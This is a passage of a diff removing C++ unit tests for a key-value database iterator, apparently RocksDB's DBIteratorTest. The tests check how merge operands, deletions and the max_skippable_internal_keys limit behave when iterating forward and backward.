-      ASSERT_EQ(db_iter->value().ToString(), ToString(i));
-      db_iter->Prev();
-      ASSERT_TRUE(db_iter->Valid());
-
-      ASSERT_EQ(db_iter->key().ToString(), "b");
-      ASSERT_EQ(db_iter->value().ToString(), "merge_1");
-      db_iter->Prev();
-      ASSERT_TRUE(db_iter->Valid());
-
-      ASSERT_EQ(db_iter->key().ToString(), "a");
-      ASSERT_EQ(db_iter->value().ToString(), "merge_2");
-      db_iter->Prev();
-
-      ASSERT_TRUE(!db_iter->Valid());
-    }
-  }
-
-  {
-    for (size_t i = 0; i < 200; ++i) {
-      TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-      internal_iter->AddMerge("b", "b");
-      internal_iter->AddMerge("a", "a");
-      for (size_t k = 0; k < 200; ++k) {
-        internal_iter->AddMerge("c", ToString(k));
-      }
-      internal_iter->Finish();
-
-      std::unique_ptr<Iterator> db_iter(NewDBIterator(
-          env_, ro, cf_options, BytewiseComparator(), internal_iter, i + 2,
-          options.max_sequential_skip_in_iterations));
-      db_iter->SeekToLast();
-      ASSERT_TRUE(db_iter->Valid());
-
-      ASSERT_EQ(db_iter->key().ToString(), "c");
-      std::string merge_result = "0";
-      for (size_t j = 1; j <= i; ++j) {
-        merge_result += "," + ToString(j);
-      }
-      ASSERT_EQ(db_iter->value().ToString(), merge_result);
-
-      db_iter->Prev();
-      ASSERT_TRUE(db_iter->Valid());
-      ASSERT_EQ(db_iter->key().ToString(), "b");
-      ASSERT_EQ(db_iter->value().ToString(), "b");
-
-      db_iter->Prev();
-      ASSERT_TRUE(db_iter->Valid());
-      ASSERT_EQ(db_iter->key().ToString(), "a");
-      ASSERT_EQ(db_iter->value().ToString(), "a");
-
-      db_iter->Prev();
-      ASSERT_TRUE(!db_iter->Valid());
-    }
-  }
-}
-
-TEST_F(DBIteratorTest, DBIteratorSkipInternalKeys) {
-  Options options;
-  ImmutableCFOptions cf_options = ImmutableCFOptions(options);
-  ReadOptions ro;
-
-  // Basic test case ... Make sure explicityly passing the default value works.
-  // Skipping internal keys is disabled by default, when the value is 0.
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddDeletion("b");
-    internal_iter->AddDeletion("b");
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->AddDeletion("c");
-    internal_iter->AddPut("d", "val_d");
-    internal_iter->Finish();
-
-    ro.max_skippable_internal_keys = 0;
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      10, options.max_sequential_skip_in_iterations));
-
-    db_iter->SeekToFirst();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "val_a");
-
-    db_iter->Next();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "d");
-    ASSERT_EQ(db_iter->value().ToString(), "val_d");
-
-    db_iter->Next();
-    ASSERT_TRUE(!db_iter->Valid());
-    ASSERT_TRUE(db_iter->status().ok());
-
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "d");
-    ASSERT_EQ(db_iter->value().ToString(), "val_d");
-
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "val_a");
-
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-    ASSERT_TRUE(db_iter->status().ok());
-  }
-
-  // Test to make sure that the request will *not* fail as incomplete if
-  // num_internal_keys_skipped is *equal* to max_skippable_internal_keys
-  // threshold. (It will fail as incomplete only when the threshold is
-  // exceeded.)
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddDeletion("b");
-    internal_iter->AddDeletion("b");
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->Finish();
-
-    ro.max_skippable_internal_keys = 2;
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      10, options.max_sequential_skip_in_iterations));
-
-    db_iter->SeekToFirst();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "val_a");
-
-    db_iter->Next();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "c");
-    ASSERT_EQ(db_iter->value().ToString(), "val_c");
-
-    db_iter->Next();
-    ASSERT_TRUE(!db_iter->Valid());
-    ASSERT_TRUE(db_iter->status().ok());
-
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "c");
-    ASSERT_EQ(db_iter->value().ToString(), "val_c");
-
-    db_iter->Prev();
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "val_a");
-
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-    ASSERT_TRUE(db_iter->status().ok());
-  }
-
-  // Fail the request as incomplete when num_internal_keys_skipped >
-  // max_skippable_internal_keys
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddDeletion("b");
-    internal_iter->AddDeletion("b");
-    internal_iter->AddDeletion("b");
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->Finish();
-
-    ro.max_skippable_internal_keys = 2;
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      10, options.max_sequential_skip_in_iterations));
-
-    db_iter->SeekToFirst();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "val_a");
-
-    db_iter->Next();
-    ASSERT_TRUE(!db_iter->Valid());
-    ASSERT_TRUE(db_iter->status().IsIncomplete());
-
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "c");
-    ASSERT_EQ(db_iter->value().ToString(), "val_c");
-
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-    ASSERT_TRUE(db_iter->status().IsIncomplete());
-  }
-
-  // Test that the num_internal_keys_skipped counter resets after a successful
-  // read.
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddDeletion("b");
-    internal_iter->AddDeletion("b");
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->AddDeletion("d");
-    internal_iter->AddDeletion("d");
-    internal_iter->AddDeletion("d");
-    internal_iter->AddPut("e", "val_e");
-    internal_iter->Finish();
-
-    ro.max_skippable_internal_keys = 2;
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      10, options.max_sequential_skip_in_iterations));
-
-    db_iter->SeekToFirst();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "val_a");
-
-    db_iter->Next();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "c");
-    ASSERT_EQ(db_iter->value().ToString(), "val_c");
-
-    db_iter->Next();  // num_internal_keys_skipped counter resets here.
-    ASSERT_TRUE(!db_iter->Valid());
-    ASSERT_TRUE(db_iter->status().IsIncomplete());
-  }
-
-  // Test that the num_internal_keys_skipped counter resets after a successful
-  // read.
-  // Reverse direction
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddDeletion("b");
-    internal_iter->AddDeletion("b");
-    internal_iter->AddDeletion("b");
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->AddDeletion("d");
-    internal_iter->AddDeletion("d");
-    internal_iter->AddPut("e", "val_e");
-    internal_iter->Finish();
-
-    ro.max_skippable_internal_keys = 2;
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      10, options.max_sequential_skip_in_iterations));
-
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "e");
-    ASSERT_EQ(db_iter->value().ToString(), "val_e");
-
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "c");
-    ASSERT_EQ(db_iter->value().ToString(), "val_c");
-
-    db_iter->Prev();  // num_internal_keys_skipped counter resets here.
-    ASSERT_TRUE(!db_iter->Valid());
-    ASSERT_TRUE(db_iter->status().IsIncomplete());
-  }
-
-  // Test that skipping separate keys is handled
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddDeletion("b");
-    internal_iter->AddDeletion("c");
-    internal_iter->AddDeletion("d");
-    internal_iter->AddPut("e", "val_e");
-    internal_iter->Finish();
-
-    ro.max_skippable_internal_keys = 2;
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      10, options.max_sequential_skip_in_iterations));
-
-    db_iter->SeekToFirst();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "val_a");
-
-    db_iter->Next();
-    ASSERT_TRUE(!db_iter->Valid());
-    ASSERT_TRUE(db_iter->status().IsIncomplete());
-
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "e");
-    ASSERT_EQ(db_iter->value().ToString(), "val_e");
-
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-    ASSERT_TRUE(db_iter->status().IsIncomplete());
-  }
-
-  // Test if alternating puts and deletes of the same key are handled correctly.
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("b", "val_b");
-    internal_iter->AddDeletion("b");
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->AddDeletion("c");
-    internal_iter->AddPut("d", "val_d");
-    internal_iter->AddDeletion("d");
-    internal_iter->AddPut("e", "val_e");
-    internal_iter->Finish();
-
-    ro.max_skippable_internal_keys = 2;
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      10, options.max_sequential_skip_in_iterations));
-
-    db_iter->SeekToFirst();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "val_a");
-
-    db_iter->Next();
-    ASSERT_TRUE(!db_iter->Valid());
-    ASSERT_TRUE(db_iter->status().IsIncomplete());
-
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "e");
-    ASSERT_EQ(db_iter->value().ToString(), "val_e");
-
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-    ASSERT_TRUE(db_iter->status().IsIncomplete());
-  }
-
-  // Test for large number of skippable internal keys with *default*
-  // max_sequential_skip_in_iterations.
-  {
-    for (size_t i = 1; i <= 200; ++i) {
-      TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-      internal_iter->AddPut("a", "val_a");
-      for (size_t j = 1; j <= i; ++j) {
-        internal_iter->AddPut("b", "val_b");
-        internal_iter->AddDeletion("b");
-      }
-      internal_iter->AddPut("c", "val_c");
-      internal_iter->Finish();
-
-      ro.max_skippable_internal_keys = i;
-      std::unique_ptr<Iterator> db_iter(NewDBIterator(
-          env_, ro, cf_options, BytewiseComparator(), internal_iter, 2 * i + 1,
-          options.max_sequential_skip_in_iterations));
-
-      db_iter->SeekToFirst();
-      ASSERT_TRUE(db_iter->Valid());
-      ASSERT_EQ(db_iter->key().ToString(), "a");
-      ASSERT_EQ(db_iter->value().ToString(), "val_a");
-
-      db_iter->Next();
-      if ((options.max_sequential_skip_in_iterations + 1) >=
-          ro.max_skippable_internal_keys) {
-        ASSERT_TRUE(!db_iter->Valid());
-        ASSERT_TRUE(db_iter->status().IsIncomplete());
-      } else {
-        ASSERT_TRUE(db_iter->Valid());
-        ASSERT_EQ(db_iter->key().ToString(), "c");
-        ASSERT_EQ(db_iter->value().ToString(), "val_c");
-      }
-
-      db_iter->SeekToLast();
-      ASSERT_TRUE(db_iter->Valid());
-      ASSERT_EQ(db_iter->key().ToString(), "c");
-      ASSERT_EQ(db_iter->value().ToString(), "val_c");
-
-      db_iter->Prev();
-      if ((options.max_sequential_skip_in_iterations + 1) >=
-          ro.max_skippable_internal_keys) {
-        ASSERT_TRUE(!db_iter->Valid());
-        ASSERT_TRUE(db_iter->status().IsIncomplete());
-      } else {
-        ASSERT_TRUE(db_iter->Valid());
-        ASSERT_EQ(db_iter->key().ToString(), "a");
-        ASSERT_EQ(db_iter->value().ToString(), "val_a");
-      }
-    }
-  }
-
-  // Test for large number of skippable internal keys with a *non-default*
-  // max_sequential_skip_in_iterations.
-  {
-    for (size_t i = 1; i <= 200; ++i) {
-      TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-      internal_iter->AddPut("a", "val_a");
-      for (size_t j = 1; j <= i; ++j) {
-        internal_iter->AddPut("b", "val_b");
-        internal_iter->AddDeletion("b");
-      }
-      internal_iter->AddPut("c", "val_c");
-      internal_iter->Finish();
-
-      options.max_sequential_skip_in_iterations = 1000;
-      ro.max_skippable_internal_keys = i;
-      std::unique_ptr<Iterator> db_iter(NewDBIterator(
-          env_, ro, cf_options, BytewiseComparator(), internal_iter, 2 * i + 1,
-          options.max_sequential_skip_in_iterations));
-
-      db_iter->SeekToFirst();
-      ASSERT_TRUE(db_iter->Valid());
-      ASSERT_EQ(db_iter->key().ToString(), "a");
-      ASSERT_EQ(db_iter->value().ToString(), "val_a");
-
-      db_iter->Next();
-      ASSERT_TRUE(!db_iter->Valid());
-      ASSERT_TRUE(db_iter->status().IsIncomplete());
-
-      db_iter->SeekToLast();
-      ASSERT_TRUE(db_iter->Valid());
-      ASSERT_EQ(db_iter->key().ToString(), "c");
-      ASSERT_EQ(db_iter->value().ToString(), "val_c");
-
-      db_iter->Prev();
-      ASSERT_TRUE(!db_iter->Valid());
-      ASSERT_TRUE(db_iter->status().IsIncomplete());
-    }
-  }
-}
-
-TEST_F(DBIteratorTest, DBIterator1) {
-  ReadOptions ro;
-  Options options;
-  options.merge_operator = MergeOperators::CreateFromStringId("stringappend");
-
-  TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-  internal_iter->AddPut("a", "0");
-  internal_iter->AddPut("b", "0");
-  internal_iter->AddDeletion("b");
-  internal_iter->AddMerge("a", "1");
-  internal_iter->AddMerge("b", "2");
-  internal_iter->Finish();
-
-  std::unique_ptr<Iterator> db_iter(NewDBIterator(
-      env_, ro, ImmutableCFOptions(options), BytewiseComparator(),
-      internal_iter, 1, options.max_sequential_skip_in_iterations));
-  db_iter->SeekToFirst();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "a");
-  ASSERT_EQ(db_iter->value().ToString(), "0");
-  db_iter->Next();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "b");
-  db_iter->Next();
-  ASSERT_FALSE(db_iter->Valid());
-}
-
-TEST_F(DBIteratorTest, DBIterator2) {
-  ReadOptions ro;
-  Options options;
-  options.merge_operator = MergeOperators::CreateFromStringId("stringappend");
-
-  TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-  internal_iter->AddPut("a", "0");
-  internal_iter->AddPut("b", "0");
-  internal_iter->AddDeletion("b");
-  internal_iter->AddMerge("a", "1");
-  internal_iter->AddMerge("b", "2");
-  internal_iter->Finish();
-
-  std::unique_ptr<Iterator> db_iter(NewDBIterator(
-      env_, ro, ImmutableCFOptions(options), BytewiseComparator(),
-      internal_iter, 0, options.max_sequential_skip_in_iterations));
-  db_iter->SeekToFirst();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "a");
-  ASSERT_EQ(db_iter->value().ToString(), "0");
-  db_iter->Next();
-  ASSERT_TRUE(!db_iter->Valid());
-}
-
-TEST_F(DBIteratorTest, DBIterator3) {
-  ReadOptions ro;
-  Options options;
-  options.merge_operator = MergeOperators::CreateFromStringId("stringappend");
-
-  TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-  internal_iter->AddPut("a", "0");
-  internal_iter->AddPut("b", "0");
-  internal_iter->AddDeletion("b");
-  internal_iter->AddMerge("a", "1");
-  internal_iter->AddMerge("b", "2");
-  internal_iter->Finish();
-
-  std::unique_ptr<Iterator> db_iter(NewDBIterator(
-      env_, ro, ImmutableCFOptions(options), BytewiseComparator(),
-      internal_iter, 2, options.max_sequential_skip_in_iterations));
-  db_iter->SeekToFirst();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "a");
-  ASSERT_EQ(db_iter->value().ToString(), "0");
-  db_iter->Next();
-  ASSERT_TRUE(!db_iter->Valid());
-}
-
-TEST_F(DBIteratorTest, DBIterator4) {
-  ReadOptions ro;
-  Options options;
-  options.merge_operator = MergeOperators::CreateFromStringId("stringappend");
-
-  TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-  internal_iter->AddPut("a", "0");
-  internal_iter->AddPut("b", "0");
-  internal_iter->AddDeletion("b");
-  internal_iter->AddMerge("a", "1");
-  internal_iter->AddMerge("b", "2");
-  internal_iter->Finish();
-
-  std::unique_ptr<Iterator> db_iter(NewDBIterator(
-      env_, ro, ImmutableCFOptions(options), BytewiseComparator(),
-      internal_iter, 4, options.max_sequential_skip_in_iterations));
-  db_iter->SeekToFirst();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "a");
-  ASSERT_EQ(db_iter->value().ToString(), "0,1");
-  db_iter->Next();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "b");
-  ASSERT_EQ(db_iter->value().ToString(), "2");
-  db_iter->Next();
-  ASSERT_TRUE(!db_iter->Valid());
-}
-
-TEST_F(DBIteratorTest, DBIterator5) {
-  ReadOptions ro;
-  Options options;
-  options.merge_operator = MergeOperators::CreateFromStringId("stringappend");
-  ImmutableCFOptions cf_options = ImmutableCFOptions(options);
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddMerge("a", "merge_2");
-    internal_iter->AddMerge("a", "merge_3");
-    internal_iter->AddPut("a", "put_1");
-    internal_iter->AddMerge("a", "merge_4");
-    internal_iter->AddMerge("a", "merge_5");
-    internal_iter->AddMerge("a", "merge_6");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      0, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_1");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddMerge("a", "merge_2");
-    internal_iter->AddMerge("a", "merge_3");
-    internal_iter->AddPut("a", "put_1");
-    internal_iter->AddMerge("a", "merge_4");
-    internal_iter->AddMerge("a", "merge_5");
-    internal_iter->AddMerge("a", "merge_6");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      1, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_1,merge_2");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddMerge("a", "merge_2");
-    internal_iter->AddMerge("a", "merge_3");
-    internal_iter->AddPut("a", "put_1");
-    internal_iter->AddMerge("a", "merge_4");
-    internal_iter->AddMerge("a", "merge_5");
-    internal_iter->AddMerge("a", "merge_6");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      2, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_1,merge_2,merge_3");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddMerge("a", "merge_2");
-    internal_iter->AddMerge("a", "merge_3");
-    internal_iter->AddPut("a", "put_1");
-    internal_iter->AddMerge("a", "merge_4");
-    internal_iter->AddMerge("a", "merge_5");
-    internal_iter->AddMerge("a", "merge_6");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      3, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "put_1");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddMerge("a", "merge_2");
-    internal_iter->AddMerge("a", "merge_3");
-    internal_iter->AddPut("a", "put_1");
-    internal_iter->AddMerge("a", "merge_4");
-    internal_iter->AddMerge("a", "merge_5");
-    internal_iter->AddMerge("a", "merge_6");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      4, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "put_1,merge_4");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddMerge("a", "merge_2");
-    internal_iter->AddMerge("a", "merge_3");
-    internal_iter->AddPut("a", "put_1");
-    internal_iter->AddMerge("a", "merge_4");
-    internal_iter->AddMerge("a", "merge_5");
-    internal_iter->AddMerge("a", "merge_6");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      5, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "put_1,merge_4,merge_5");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddMerge("a", "merge_2");
-    internal_iter->AddMerge("a", "merge_3");
-    internal_iter->AddPut("a", "put_1");
-    internal_iter->AddMerge("a", "merge_4");
-    internal_iter->AddMerge("a", "merge_5");
-    internal_iter->AddMerge("a", "merge_6");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      6, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "put_1,merge_4,merge_5,merge_6");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    // put, singledelete, merge
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddSingleDeletion("a");
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddMerge("a", "merge_2");
-    internal_iter->AddPut("b", "val_b");
-    internal_iter->Finish();
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      10, options.max_sequential_skip_in_iterations));
-    db_iter->Seek("b");
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-  }
-}
-
-TEST_F(DBIteratorTest, DBIterator6) {
-  ReadOptions ro;
-  Options options;
-  options.merge_operator = MergeOperators::CreateFromStringId("stringappend");
-  ImmutableCFOptions cf_options = ImmutableCFOptions(options);
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddMerge("a", "merge_2");
-    internal_iter->AddMerge("a", "merge_3");
-    internal_iter->AddDeletion("a");
-    internal_iter->AddMerge("a", "merge_4");
-    internal_iter->AddMerge("a", "merge_5");
-    internal_iter->AddMerge("a", "merge_6");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      0, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_1");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddMerge("a", "merge_2");
-    internal_iter->AddMerge("a", "merge_3");
-    internal_iter->AddDeletion("a");
-    internal_iter->AddMerge("a", "merge_4");
-    internal_iter->AddMerge("a", "merge_5");
-    internal_iter->AddMerge("a", "merge_6");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      1, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_1,merge_2");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddMerge("a", "merge_2");
-    internal_iter->AddMerge("a", "merge_3");
-    internal_iter->AddDeletion("a");
-    internal_iter->AddMerge("a", "merge_4");
-    internal_iter->AddMerge("a", "merge_5");
-    internal_iter->AddMerge("a", "merge_6");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      2, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_1,merge_2,merge_3");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddMerge("a", "merge_2");
-    internal_iter->AddMerge("a", "merge_3");
-    internal_iter->AddDeletion("a");
-    internal_iter->AddMerge("a", "merge_4");
-    internal_iter->AddMerge("a", "merge_5");
-    internal_iter->AddMerge("a", "merge_6");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      3, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddMerge("a", "merge_2");
-    internal_iter->AddMerge("a", "merge_3");
-    internal_iter->AddDeletion("a");
-    internal_iter->AddMerge("a", "merge_4");
-    internal_iter->AddMerge("a", "merge_5");
-    internal_iter->AddMerge("a", "merge_6");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
